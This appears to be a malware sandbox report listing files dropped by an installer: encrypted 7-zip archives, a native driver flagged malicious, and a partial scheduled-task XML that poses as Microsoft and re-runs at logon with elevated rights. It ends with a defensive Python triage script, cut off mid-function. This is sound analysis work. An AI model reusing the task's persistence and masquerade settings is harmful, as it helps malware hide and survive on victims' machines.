                          Preview:.#........J..#..Q.JQ;...}....S..U?.S.Z.qcL.XY:#w..).R.I..Dx....r....2. .T.....iC.:.2..+^..t...tc.......8p&....|...y*c....M..q..e1Xk.4...x..F.n.F....e0....ow.......P.I@.r..'7..Fh%..E.b.....<...iw6Z.......YvY...~YT..`.2rgl.......2..7.,.guV..............c#2....W.Z.....E.$....j......m...d..#.Xq.-J..Q.v.{.q...J'G....#<(.cc=hA.2.6iy.-8N.....(.!..zd..YQ......j-^..e..*X!..5..f.M,..j..&G......q...*......3.#.xQ.3.(.{..2..n.....g../..T5q......f.........3My4......I.......2.......#k...yg.....).2y........:..)!9K..NB..?.&..b.k...N...xc.K..T....3.K.;.\...../(7.r....>.g.....w."...R..>.;8@:....0lK7>.&1p./.?b}.;._b..|[.TC...UO.W...br.Kp....6m.B...$NOL.......R7r..&/d..^.:......o.f...?@.@....t^e...@.4.I)...)-.y.K.Y....2..~...>..d.<.....n....\l|..H.d3t...L?"..l... ..>....wc....T.......L7.....j.......l...K......,yB ......N.......L_...Z.at..O</..X.~...E..y...q~G....1..=.rwR....Y.......(3m..>.R~F.U....J.w.....L.Jx|.b.....l.B.'A&....z.X..K.T.G...{9..i...e.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996643243558829
                          Encrypted:true
                          SSDEEP:1536:OB96vjwLrnk4oI1zr06mcoXXcLrmSYmmlTaZAB2awGqw:cUb4rkk5I6YcBYmmzBfh
                          MD5:499F183D11BB9D100ECBF7FD156C56AE
                          SHA1:A49086BAB8E06B37BB2729663F8D5BB2C4D89A9B
                          SHA-256:3025E8E51DBA5D77D4DBBE7A1EDBFDE9A19C60306B712895E7F18963982CDB43
                          SHA-512:7E2F46DE855C67CAA606DB1000F0FEA4EEAE55620E34B48BA9076245A686496648F8279C511412C70E08E9CC2C3AD3F8B5853F2EDFA897647993438FA1E11056
                          Malicious:false
                          Preview:.@S......6.l ..............Q*..}."...|..P{....;X..gi......k..l...MPD.D..=...T..w..6vH.8....7.^.......d.?.D.(.).a.-U...&..w.$....o..'.D:^.Q9....t.t.v=..[.PO..'A..0zW...n%.Aye{...tUY.....5.`-.)......\.h.1.^...:...$....N...O.ot.s.._.bPi.w...qZ.q....t|^<.....%..wR.....y.........)ad5.sG.?.%.9..Cg..xLx...d..;.6.o...w.c......@L.].6..I....;..4.8(ZM.5..c.u.)`d...?^F.1.....(Hj.IM...J...~...."......B09.2@..^._.k<.S.V..Sx'..,..:.O.`.].+99..R..`......by.\.e...q..<..ScF.a.q.7..X%...U.............b.F?...........e"{......^...c......Z.....r.zO@~. .!Rg.[@...%.*&...s.+.b..{..I.k,n......r....H...]D..[..n....'...e.=.o....`+..m3...*trP.2..Q8e0.{...V...!?WZ.2.oU.q....9..;......>@...$".^..^...<.0EU..H...;E.CBJ]c~A..{.C..~R|27...{.?LW..q:...=....SU%r.`}.u..........RV_.B,.L..[....h.d..:..h._6...d.t.U<.e..S...^.A.Y.`..{..DY..ZE.n +m*e.M..m<.O1r.-.sd.".....*=5v./v.!...]...P5$R.r....[... .W...U ./.,{r.5h.^...o.>.M.E4...D...!s.N...$..<..N..v.!......6..Cq..07Q
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996643243558827
                          Encrypted:true
                          SSDEEP:768:dOgF0xeYTrPzC17HiuO90X3o5NyGBZvDvTCDRA63/UYK6LR79DUrFQ+W3IOpmsCA:dOgATuHCNyGBoDmA/iaJUZilTeZ0cM
                          MD5:9879CBB6CD59F92E48BCABAABEA1F242
                          SHA1:236E0679940B8328256717B86B499265A30B6F14
                          SHA-256:F55074BCCC64EA17CDF518D06B57BBF5E67D4A12632B91F9798E5DD4084AFFC4
                          SHA-512:5DC8902DAB75025AFB57F322BCD142E4989C61B3C07A60689C7616E84F0237A825975EA4D3E8C8A3DD939363A9B4E5DB30368CC975DBE39C1888C66ED57DBC15
                          Malicious:false
                          Preview:7z..'...ho..........2..............w.b.sz..(J.@...&...b+6kPx..3.=d....k. 5...C.'JE..7..f.21.2i..C.N.n|.....{.Z...(..j}...t...M.m.A..`..B..j-.....Q....5..8&..6..2%...Q....*.....)`P6.J.t....!/.a:R>........c2.=V...@o..]A.g..m...)...%......}....aY......X<Y.KZ..M..0v...u.uoY.O3....N.2.R.>;.......2/).mY....x;&~.5t.3..j.".."E.\.Cp.,.] .|?.i...X.Wm.......2Y!I......n."..]..Io....._.W/...Z.W.gi.....9.9l.(D..U....~v&f...e%A.)\t.e...o.(....1.y1...[)}(...9.+_.u ....V.UO......k.~...cAG..5nw.qk#)....I..^G..v..P1Jv.w.'RX..mh(.^.a..f.>..X.S.W....5'2......D.j...M.. h...L..VQ/.6r....:.r......bViF.D$....'...p...x...O<....)............}S:.....Qr.......MG,...|...A.......3q6.....{......-.D...k.F......y.....r3W..........;.9......zFI.....A..Z.z._T.4...]..*.LJ}a.>.B.U...!....FC.4=...._.d,.,U..0...cp.+.q..5....zxi.c..M.m~.qg...E.X................|..[...~ .......o.=;......._.K.IFn+..f......g.......i.z..#\...H...Z..{6$.X...E..t.)x#._,.$.|Gw.R.e.. ...i...
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255975
                          Encrypted:true
                          SSDEEP:1536:crCPEbYP46GiC3q6cGOlLvjmS9UWgvy/F2QFtTVAe:iCIR913q8wjmS9bhKe
                          MD5:CEA69F993E1CE0FB945A98BF37A66546
                          SHA1:7114365265F041DA904574D1F5876544506F89BA
                          SHA-256:E834D26D571776C889E2D09892C6E562EA62CD6524D8FC625E6496A1742F5DBB
                          SHA-512:4BCBB5AD50446CD4FAD5ED3C530E29CC9DD7DDCB7B912D7C546AF8CCF7DA74BC1EEC397846BFB97858BABC9AA46BB3F3D0434F414BBC3B15B9FDBB7BF3ED59F9
                          Malicious:false
                          Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):56546
                          Entropy (8bit):7.996966859255979
                          Encrypted:true
                          SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                          MD5:4CB8B7E557C80FC7B014133AB834A042
                          SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                          SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                          SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                          Malicious:false
                          Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                          MD5:8622FC7228777F64A47BD6C61478ADD9
                          SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                          SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                          SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                          Malicious:false
                          Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):31890
                          Entropy (8bit):7.99402458740637
                          Encrypted:true
                          SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                          MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                          SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                          SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                          SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                          Malicious:false
                          Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.99759370165655
                          Encrypted:true
                          SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                          MD5:950338D50B95A25F494EE74E97B7B7A9
                          SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                          SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                          SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                          Malicious:false
                          Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):74960
                          Entropy (8bit):7.997593701656546
                          Encrypted:true
                          SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                          MD5:059BA7C31F3E227356CA5F29E4AA2508
                          SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                          SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                          SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                          Malicious:false
                          Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653607
                          Encrypted:true
                          SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                          MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                          SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                          SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                          SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                          Malicious:false
                          Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):29730
                          Entropy (8bit):7.994290657653608
                          Encrypted:true
                          SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                          MD5:A9C8A3E00692F79E1BA9693003F85D18
                          SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                          SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                          SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                          Malicious:false
                          Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:7-zip archive data, version 0.4
                          Category:dropped
                          Size (bytes):1991296
                          Entropy (8bit):7.999905359856561
                          Encrypted:true
                          SSDEEP:49152:ynmSM3y/RF7EiDKCrZrs9JiM6VCbNbaWWdQsR1moZ3UXCQw:ymRi51EiXtrMJiNiOWWjbbQw
                          MD5:D16EBCD4863229D2C0541C8BF7D701D0
                          SHA1:BB5516ABE88F0236482026FD4C116405CACB1E06
                          SHA-256:2D6C81ED60C4F07B8928FAE1B30A299D9EBA2D0924D06CC0EF6DAF0177549E84
                          SHA-512:959B5906B2EC7D01ACF1224B11C45724FB17A8763FEB6A745E9D8FC04FEBBFBB87AE8E1C3D2E892C9DDFB7160E9D1DC423EDEBA88E19F3A162B0EF5F79C4A78E
                          Malicious:false
                          Preview:7z..'...9... b......@.........v'........c...Z..M..6._.}..h.J.pPD|..-............S^@..0%. ..S;U.....w'|../....G.................]0.e...I.!:...l...+.D..V.....L(>.;..&.8+..w.2(VCI.$..]I..D......N....$H.....Z.+.7=.7..VhdZ7.Lg....bP&...w..i..Yc!..O...h.._.li..Y...HcRF...5.4B.M.........B.&)..F..|.....lm.SF.$s.B]F.....o...f.$F.v..E`.....E..I......o#b...L..E@.nvq.%=...EG...2.%T.+[.Y0.z.."..$..@.....J......c.......k...o.}..`d.1e\......O..Py...%..{x..$.....x..z]@.3...,....K..)1f.Z.....=\Y..P.n;.9.vL.+.:D>6....2.J.6..3GL.X.w..D$..h\.q...[_a ./.M...0.....E..*C....r...%.#y.$.x. f....2gG.MzXsC.k0..{(.(t......f..%F.4....g^.@.1.q........"....K../..4....0b.Qm.W.X.|.+.sW.C..Q.9l(..r3.v..a ......A..t..I..AThU...&7..S..D.....4Q.......]..:.....O...82.....y.......%#...83:.W...{)........1GO.qb\...C..XY}.f..O.q...{.....R.L.@r.....k/...8%..8.q2H....P.GY..X....P..X?.&.2|....H..4]......_..a.x6Z-..6....j&...P..h.V..VebV.5Aa..T1.F.>e4(*...`|..y<......c..;0...LM
                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                          File Type:PE32+ executable (native) x86-64, for MS Windows
                          Category:dropped
                          Size (bytes):63640
                          Entropy (8bit):6.482810107683822
                          Encrypted:false
                          SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                          MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                          SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                          SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                          SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 9%
                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                          Process:C:\Users\user\AppData\Local\Temp\is-GS7VN.tmp\cVyexkZjrG.tmp
                          File Type:data
                          Category:dropped
                          Size (bytes):4096
                          Entropy (8bit):3.3449406240731085
                          Encrypted:false
                          SSDEEP:48:dXKLzDlnDPLL6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnDP6whldOVQOj6dKbKsz7
                          MD5:1EA10B1FA76DC2F1967E53A3FC2D43C4
                          SHA1:23EADA9D0994D5B9ADE7878493C44551C0B5CF44
                          SHA-256:2748447EBDE83E35B8984D2993A8331DAC7B7924638502024D8531A07E74C63C
                          SHA-512:15BF2663CEF3905AE3B13D0A4ABC2E3BBF1FF213BCA5C568641978D5548A7DBED2EC7FC5A00B330287E90DF675EFB804613D4801F6995C7748840CC0BCBA637F
                          Malicious:false
                          Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAv
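The task definition previewed above registers a root-level task named \kafanbbs with a "Microsoft Corporation" author string, a logon trigger, RunLevel HighestAvailable, AllowHardTerminate false and MultipleInstancesPolicy Parallel. The following Python is an added example for this page, not code from Joe Sandbox or from the sample: it parses a Task Scheduler XML definition and reports those traits as findings. SAMPLE_TASK_XML is constructed from the fields visible in the preview and closed off so it parses; it omits everything after the point where the preview is cut off. The function names and finding tags are this example's own.

```python
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed from the visible fields of the preview above; the elements the
# preview truncates are not reproduced, and no <Actions> block is present.
SAMPLE_TASK_XML = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2005-10-11T13:21:17-08:00</Date>
    <Author>Microsoft Corporation</Author>
    <Version>1.0.0</Version>
    <Description>Microsoft</Description>
    <URI>\\kafanbbs</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user</UserId>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="System">
      <UserId>user</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
</Task>
"""


def _text(root, path):
    """Stripped text of the first element at a namespaced path, or None."""
    el = root.find(path, TASK_NS)
    return el.text.strip() if el is not None and el.text else None


def triage_task_xml(xml_text):
    """Return a list of (tag, detail) findings for a Task Scheduler XML definition."""
    root = ET.fromstring(xml_text)
    findings = []
    author = _text(root, "t:RegistrationInfo/t:Author") or ""
    uri = _text(root, "t:RegistrationInfo/t:URI") or ""
    # Tasks that Windows registers itself live under \Microsoft\...; a task that
    # borrows the Microsoft author string but sits at the root of the task
    # library is imitating them.
    if "microsoft" in author.lower() and not uri.lower().startswith("\\microsoft\\"):
        findings.append(("masquerade", f"author '{author}' but URI '{uri}' is outside \\Microsoft\\"))
    if root.find("t:Triggers/t:LogonTrigger", TASK_NS) is not None:
        findings.append(("persistence", "LogonTrigger: re-runs at every logon"))
    if _text(root, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append(("privilege", "RunLevel HighestAvailable: runs with the user's full token"))
    if _text(root, "t:Settings/t:AllowHardTerminate") == "false":
        findings.append(("resilience", "AllowHardTerminate false: the scheduler will not kill the task"))
    if _text(root, "t:Settings/t:MultipleInstancesPolicy") == "Parallel":
        findings.append(("resilience", "MultipleInstancesPolicy Parallel: several copies may run at once"))
    if root.find("t:Actions", TASK_NS) is None:
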